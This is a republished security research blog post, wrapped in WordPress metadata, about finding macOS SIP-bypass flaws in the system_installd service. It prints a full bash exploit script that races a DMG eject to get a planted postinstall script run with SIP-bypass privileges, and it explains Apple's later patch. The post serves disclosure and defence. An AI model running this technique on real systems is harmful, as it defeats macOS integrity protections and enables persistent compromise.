{"id":49801,"date":"2022-12-20T00:00:00","date_gmt":"2022-12-20T00:00:00","guid":{"rendered":"urn:uuid:8bebeda3-0877-70cc-5492-ecdd109828e9"},"modified":"2022-12-20T00:00:00","modified_gmt":"2022-12-20T00:00:00","slug":"diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypass-vulnerabilities","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypass-vulnerabilities\/","title":{"rendered":"Diving into an Old Exploit Chain and Discovering 3 new SIP-Bypass Vulnerabilities"},"content":{"rendered":"

<\/p>\n

<\/div>\n

A new bypass appears<\/span><\/b><\/p>\n

According to the aforementioned patch, we can see that if we can bypass the volume path check at line 81, then the system_installd<\/i> service will spawn the script directly instead of resorting to the isolated XPC service.<\/p>\n

The question then is, how can we bypass the volume path check? Through debugging, we found that the destination volume path returned at line 80 is an arbitrary mounted DMG volume path that we specified from the installer command line.<\/p>\n

So what happens if we eject the DMG volume immediately before the check? Testing this inquiry, we found that it would return the root volume at line 80 and bypass the check at line 81 as expected.<\/p>\n

Here is how the exploitation works using a bash script:<\/p>\n

#!\/bin\/bash<\/span><\/p>\n

echo “[*] preparing the payload…”
MOUNT_DIR=”\/tmp\/.exploit”
PAYLOAD_DIR=”$MOUNT_DIR\/payload”
PAYLOAD_POST_PATH=”$PAYLOAD_DIR\/postinstall”
PAYLOAD_PRE_PATH=”$PAYLOAD_DIR\/preinstall”
mkdir -p “$PAYLOAD_DIR”
# create postinstall script
echo “#!\/bin\/bash” > “$PAYLOAD_POST_PATH”
echo $1 >> “$PAYLOAD_POST_PATH”
chmod +x “$PAYLOAD_POST_PATH”
# create preinstall script just to make the exploit more elegant
echo “#!\/bin\/bash” > “$PAYLOAD_PRE_PATH”
echo “echo ‘just a place holder, our payload is in the postinstall.'” >> “$PAYLOAD_PRE_PATH”
chmod +x “$PAYLOAD_PRE_PATH”<\/p>\n

echo “[*] preparing the dmg mounting…”
hdiutil create -size 50m -volname .exploit -ov disk.dmg
hdiutil attach -mountpoint $MOUNT_DIR disk.dmg<\/p>\n

sudo echo “[*] all the preparations are done.”
sudo installer -pkg $2 -target $MOUNT_DIR &<\/p>\n

echo “[*] waiting for installer…”
while true ; do
    target=`compgen -G “$MOUNT_DIR\/.PKInstallSandboxManager-SystemSoftware\/*\/OpenPath*\/Scripts\/*\/postinstall”`
    if [ $target ]; then
          #hdiutil detach $MOUNT_DIR
          #detach is slow, kill the process will help us eject the dmg immediately, to win the race condition.
          kill -9 `pgrep diskimages`
          # re-create the scripts path and put our payload inside.
          TARGET_DIR=”${target%’postinstall’}”
          echo “[*] re-creating target path: $TARGET_DIR”
          mkdir -p “$TARGET_DIR”
          mv “$PAYLOAD_DIR\/*” “$TARGET_DIR”
          echo “[*] replaced target: $target”
          break
    fi
done
echo “[*] all done. enjoy :P”<\/p>\n

Here\u2019s how the exploit works:<\/p>\n

    \n
  1.        Before installing a PKG file, create a malicious post-install script and then mount a DMG volume<\/li>\n
  2.        Use the installer <\/i>command to install an Apple-signed package to the DMG volume<\/li>\n
  3.        Monitor the file creation of the post-install script in the DMG volume<\/li>\n
  4.        Once found, eject the DMG volume immediately, and then recreate the same directory on the root volume<\/li>\n
  5.        Move the previously prepared payload script into the directory<\/li>\n
  6.        Wait for the payload script to be executed in a SIP-Bypass context<\/li>\n<\/ol>\n

    There is a small trick used in this exploit: the detach <\/i>subcommand of hdiutil<\/i> is too slow to win the race condition. The fastest way is to kill the diskimages-helper <\/i>process directly.<\/p>\n

    The bash exploitation should have worked, but it failed. This is because the shell script is so slow, it always loses the race condition. However, rewriting the logic in C language would cause the script to work.<\/p>\n

    A new patch<\/span><\/b><\/p>\n

    Apple addressed the issue with CVE-2022-26690<\/a>.<\/p>\n

    Before launching the package scripts, it will check whether the scripts <\/i>directory is restricted (trusted). If not, it will use the safe and isolated XPC service to launch the script.<\/p>\n

    This logic works for three reasons:<\/p>\n

      \n
    1.       In a normal scenario, the scripts<\/i> directory is restricted for Apple-signed packages. It is inside a restricted path, \/Library\/Apple\/<\/i>. Thus, the script inside can be trusted and will be spawned directly.<\/li>\n
    2.       If installed to a mounted DMG volume, the scripts <\/i>directory is not restricted, even though it was created by the API, rootless_mkdir_restricted<\/i>. So, the script inside a DMG volume is untrusted and should be launched by the isolated XPC service.       <\/li>\n
    3.       If the DMG volume is ejected, the scripts <\/i>directory will disappear. Even if the same path is created, it will not be restricted.<\/li>\n<\/ol>\n

      Read More HERE<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"

      More than two years ago, a researcher, A2nkF demonstrated the exploit chain from root privilege escalation to SIP-Bypass up to arbitrary kernel extension loading. In this blog entry, we will discuss how we discovered 3 more vulnerabilities from the old exploit chain. Read More HERE…<\/p>\n","protected":false},"author":2,"featured_media":49802,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_layout":"default_layout","footnotes":""},"categories":[61],"tags":[9510,9508,9555,9509],"class_list":["post-49801","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-trendmicro","tag-trend-micro-research-articles-news-reports","tag-trend-micro-research-endpoints","tag-trend-micro-research-exploitsvulnerabilities","tag-trend-micro-research-research"],"yoast_head":"\nDiving into an Old Exploit Chain and Discovering 3 new SIP-Bypass Vulnerabilities 2026 | ThreatsHub Cybersecurity News<\/title>\n<meta name=\"description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.threatshub.org\/blog\/diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypass-vulnerabilities\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Diving into an Old Exploit Chain and Discovering 3 new SIP-Bypass Vulnerabilities 2026 | ThreatsHub Cybersecurity News\" \/>\n<meta property=\"og:description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.threatshub.org\/blog\/diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypass-vulnerabilities\/\" \/>\n<meta property=\"og:site_name\" content=\"ThreatsHub Cybersecurity News\" \/>\n<meta property=\"article:published_time\" content=\"2022-12-20T00:00:00+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/22\/Diving-into-an-Old-Exploit-Chain-and-Discovering-3-new-SIP-Bypass-Vulnerabilities-641.png\" \/>\n<meta name=\"author\" content=\"TH Author\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@threatshub\" \/>\n<meta name=\"twitter:site\" content=\"@threatshub\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"TH Author\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypass-vulnerabilities\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypass-vulnerabilities\\\/\"},\"author\":{\"name\":\"TH Author\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\"},\"headline\":\"Diving into an Old Exploit Chain and Discovering 3 new SIP-Bypass Vulnerabilities\",\"datePublished\":\"2022-12-20T00:00:00+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypass-vulnerabilities\\\/\"},\"wordCount\":778,\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypass-vulnerabilities\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2022\\\/12\\\/diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypass-vulnerabilities.png\",\"keywords\":[\"Trend Micro Research : Articles, News, Reports\",\"Trend Micro Research : Endpoints\",\"Trend Micro Research : Exploits&Vulnerabilities\",\"Trend Micro Research : Research\"],\"articleSection\":[\"TrendMicro\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypass-vulnerabilities\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypass-vulnerabilities\\\/\",\"name\":\"Diving into an Old Exploit Chain and Discovering 3 new SIP-Bypass Vulnerabilities 2026 | ThreatsHub Cybersecurity News\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypass-vulnerabilities\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypass-vulnerabilities\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2022\\\/12\\\/diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypass-vulnerabilities.png\",\"datePublished\":\"2022-12-20T00:00:00+00:00\",\"description\":\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypass-vulnerabilities\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypass-vulnerabilities\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypass-vulnerabilities\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2022\\\/12\\\/diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypass-vulnerabilities.png\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2022\\\/12\\\/diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypass-vulnerabilities.png\",\"width\":641,\"height\":350},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypass-vulnerabilities\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Trend Micro Research : Articles, News, Reports\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/tag\\\/trend-micro-research-articles-news-reports\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Diving into an Old Exploit Chain and Discovering 3 new SIP-Bypass Vulnerabilities\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"name\":\"ThreatsHub Cybersecurity News\",\"description\":\"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"alternateName\":\"Threatshub.org\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\",\"name\":\"ThreatsHub.org\",\"alternateName\":\"Threatshub.org\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"width\":432,\"height\":435,\"caption\":\"ThreatsHub.org\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/threatshub\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\",\"name\":\"TH Author\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"caption\":\"TH Author\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Diving into an Old Exploit Chain and Discovering 3 new SIP-Bypass Vulnerabilities 2026 | ThreatsHub Cybersecurity News","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.threatshub.org\/blog\/diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypass-vulnerabilities\/","og_locale":"en_US","og_type":"article","og_title":"Diving into an Old Exploit Chain and Discovering 3 new SIP-Bypass Vulnerabilities 2026 | ThreatsHub Cybersecurity News","og_description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","og_url":"https:\/\/www.threatshub.org\/blog\/diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypass-vulnerabilities\/","og_site_name":"ThreatsHub Cybersecurity News","article_published_time":"2022-12-20T00:00:00+00:00","og_image":[{"url":"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/22\/Diving-into-an-Old-Exploit-Chain-and-Discovering-3-new-SIP-Bypass-Vulnerabilities-641.png","type":"","width":"","height":""}],"author":"TH Author","twitter_card":"summary_large_image","twitter_creator":"@threatshub","twitter_site":"@threatshub","twitter_misc":{"Written by":"TH Author","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.threatshub.org\/blog\/diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypass-vulnerabilities\/#article","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypass-vulnerabilities\/"},"author":{"name":"TH Author","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476"},"headline":"Diving into an Old Exploit Chain and Discovering 3 new SIP-Bypass Vulnerabilities","datePublished":"2022-12-20T00:00:00+00:00","mainEntityOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypass-vulnerabilities\/"},"wordCount":778,"publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypass-vulnerabilities\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2022\/12\/diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypass-vulnerabilities.png","keywords":["Trend Micro Research : Articles, News, Reports","Trend Micro Research : Endpoints","Trend Micro Research : Exploits&Vulnerabilities","Trend Micro Research : Research"],"articleSection":["TrendMicro"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.threatshub.org\/blog\/diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypass-vulnerabilities\/","url":"https:\/\/www.threatshub.org\/blog\/diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypass-vulnerabilities\/","name":"Diving into an Old Exploit Chain and Discovering 3 new SIP-Bypass Vulnerabilities 2026 | ThreatsHub Cybersecurity News","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypass-vulnerabilities\/#primaryimage"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypass-vulnerabilities\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2022\/12\/diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypass-vulnerabilities.png","datePublished":"2022-12-20T00:00:00+00:00","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","breadcrumb":{"@id":"https:\/\/www.threatshub.org\/blog\/diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypass-vulnerabilities\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.threatshub.org\/blog\/diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypass-vulnerabilities\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypass-vulnerabilities\/#primaryimage","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2022\/12\/diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypass-vulnerabilities.png","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2022\/12\/diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypass-vulnerabilities.png","width":641,"height":350},{"@type":"BreadcrumbList","@id":"https:\/\/www.threatshub.org\/blog\/diving-into-an-old-exploit-chain-and-discovering-3-new-sip-bypass-vulnerabilities\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.threatshub.org\/blog\/"},{"@type":"ListItem","position":2,"name":"Trend Micro Research : Articles, News, Reports","item":"https:\/\/www.threatshub.org\/blog\/tag\/trend-micro-research-articles-news-reports\/"},{"@type":"ListItem","position":3,"name":"Diving into an Old Exploit Chain and Discovering 3 new SIP-Bypass Vulnerabilities"}]},{"@type":"WebSite","@id":"https:\/\/www.threatshub.org\/blog\/#website","url":"https:\/\/www.threatshub.org\/blog\/","name":"ThreatsHub Cybersecurity News","description":"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform","publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"alternateName":"Threatshub.org","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.threatshub.org\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.threatshub.org\/blog\/#organization","name":"ThreatsHub.org","alternateName":"Threatshub.org","url":"https:\/\/www.threatshub.org\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","width":432,"height":435,"caption":"ThreatsHub.org"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/threatshub"]},{"@type":"Person","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476","name":"TH Author","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","caption":"TH Author"}}]}},"_links":{"self":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/49801","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/comments?post=49801"}],"version-history":[{"count":0,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/49801\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media\/49802"}],"wp:attachment":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media?parent=49801"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/categories?post=49801"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/tags?post=49801"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}